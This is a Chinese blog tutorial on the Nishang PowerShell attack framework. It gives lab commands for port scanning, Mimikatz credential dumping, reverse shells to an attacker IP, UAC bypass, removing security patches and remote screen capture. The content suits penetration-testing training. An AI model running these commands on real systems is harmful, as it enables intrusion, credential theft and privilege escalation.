Nishang powershell框架——使用教程

项目下载地址:https://github.com/samratashok/nishang

一、nishang的简单介绍

Nishang是一个PowerShell攻击框架,它是PowerShell攻击脚本和有效载荷的一个集合。

nishang下载后的目录列表如下图所示,每个目录对应一个功能模块
在这里插入图片描述

二、nishang的简单使用

首先打开powershell
在这里插入图片描述

导入模块 nishang
必须导入nishang模块,才可以使用这个工具

Import-Module .\nishang.psm1

在这里插入图片描述
初次导入,会有红色字的警告提示,如上图所示,是因为windows官方做的一个安全策略导致

**解决方法:**把执行策略修改一下即可,执行完命令之后按默认选项回车即可

Set-ExecutionPolicy RemoteSigned

在这里插入图片描述
再次导入模块 nishang,没有宏色警告了,下图中黄色的警告不用管
在这里插入图片描述
**查看nishang模块的所有功能:
Get-Command -Module nishang 得到的命令来自nishang模块
在这里插入图片描述
比如:
Check-VN:检测是否是虚拟机版本
Get-Information:获取常规计算机信息
在这里插入图片描述

端口扫描

扫描192.168.184.125-192.168.184.130所有存活主机,以及存活主机开放的端口

Invoke-PortScan -StartAddress 192.168.184.125 -EndAddress 192.168.184.130 -ResolveHost -ScanPort

在这里插入图片描述

获取计算机密码

加载mimikatz获取计算机密码

Invoke-Mimikatz

在这里插入图片描述
如果是简单密码可以直接显示出来,复杂密码显示hash值
在这里插入图片描述
注意:
如果报错提示:win10 ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory

需要win10以管理员身份运行powershell即可解决该问题

获取计算机密码hash值

获取账号密码的hash值

Get-PassHashes

在这里插入图片描述

反弹shell

Invoke-PowershellTcp -Reverse -IPAddress x.x.x.x -Port xxxx
nc -lvvp xxxx
反弹tcp协议

Invoke-Powershelludp -Reverse -IPAddress x.x.x.x -port xxxx
nc -lup xxxx
反弹udp协议

Invoke-PoshRatHttp -IPAddress x.x.x.x -Port xxxx
反弹http协议

Invoke-PoshRatHttps -IPAddress x.x.x.x -Port xxxx
反弹https协议

加入你已经poweshell控制了对方电脑,需要把会话反弹
首先打开kali监听端口1111

nc -nvlp 1111

在这里插入图片描述
反弹shell到192.168.184.145的1111端口

Invoke-PowerShellTcp -Reverse -IPAddress 192.168.184.145 -Port 1111

在这里插入图片描述
执行命令后,成功反弹shell如下图所示
在这里插入图片描述

BypassUAC提权

假设已经将nishang下载到受害主机接下来需要进行UAC提权

使用sysprep方法和默认的Payload执行

Invoke-PsUACme -Verbose

打开受害者主机的powershell,执行命令:Invoke-PsUACme,执行成功后会弹窗一个窗口,
窗口是超级管理员权限,可以添加账号
在这里插入图片描述

//使用oobe方法和默认的Payload执行
Invoke-PsUACme -method oobe -Verbose
//使用-Payload参数可以自行指定要执行的Payload
Invoke-PsUACme -method oobe -Payload "powershell -windowstyle hidden -e YourEncodedPayload"

删除补丁

Remove-Update KB4534132

比如删除KB2534111补丁包,如下图所示。
删除补丁包之后服务器会出现漏洞,可根据漏洞进行利用
在这里插入图片描述

屏幕监控

靶机:Show-TargetScreen -Reverse -IPAddress x.x.x.x -Port xxxx
攻击机:netcat -nlvp xxxx | netcat -nlvp yyyy
URL访间攻击机 IP: yyyy

比如在靶机上执行命令:

Show-TargetScreen -Reverse -IPAddress 192.168.184.145 -Port 1111

在这里插入图片描述
在kali上执行监听命令,并且将监听到的1111端口的数据转发到9999端口上去
在这里插入图片描述
在kali浏览器上输入:127.0.0.1:9999 可以实时监控靶机电脑屏幕
在这里插入图片描述

除了以上示例之外,还可以及逆行弱口令爆破、内网嗅探、中间人攻击等

参考链接:
https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/

更多web安全工具、存在漏洞的网站搭建源码、渗透测试思路,收集整理在知识星球。
在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

W小哥1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值